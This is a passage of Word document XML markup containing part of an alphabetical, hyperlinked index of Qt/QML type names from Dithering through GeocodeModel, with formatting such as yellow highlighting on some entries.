                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Dithering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899" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>double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900" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DoubleValidator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901" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Drag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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DragEvent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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Drawer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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DropArea</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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DropShadow</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00490E7E" w:rsidP="000821BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId906" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DwmFeatures</w:t>
              </w:r>
            </w:hyperlink>
            <w:bookmarkStart w:id="1166" w:name="e"/>
            <w:bookmarkEnd w:id="1166"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>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r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>E</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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>EditorialModel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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Effect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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>EllipseShape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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Emitter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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>EnterKey: QtQuick</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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>EnterKey: QtVirtualKeyboard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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>EnterKeyAction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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Entity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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>EntityLoader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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>enumeration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17" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ExclusiveGroup</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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ExtendedAttributes</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67" w:name="f"/>
            <w:bookmarkEnd w:id="1167"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FastBlur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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialog: QtQuickDialogs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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialog: QtLabsPlatform</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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialogRequest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23" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FillerKey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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FilterKey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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FinalState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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FirstPersonCameraController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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Flickable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28" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Flipable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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Flow</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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FocusScope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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FolderDialog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932" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FolderListModel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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>font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934" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FontDialog: QtQuickDialogs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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FontDialog: QtLabsPlatform</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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FontLoader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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FontMetrics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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FormValidationMessageRequest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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ForwardRenderer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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Frame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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FrameAction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42" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FrameGraphNode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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Friction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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FrontFace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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FrustumCulling</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1168" w:name="g"/>
            <w:bookmarkEnd w:id="1168"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G</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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GammaAdjust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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Gauge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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GaugeStyle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949" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GaussianBlur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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>geocircle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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GeocodeModel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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
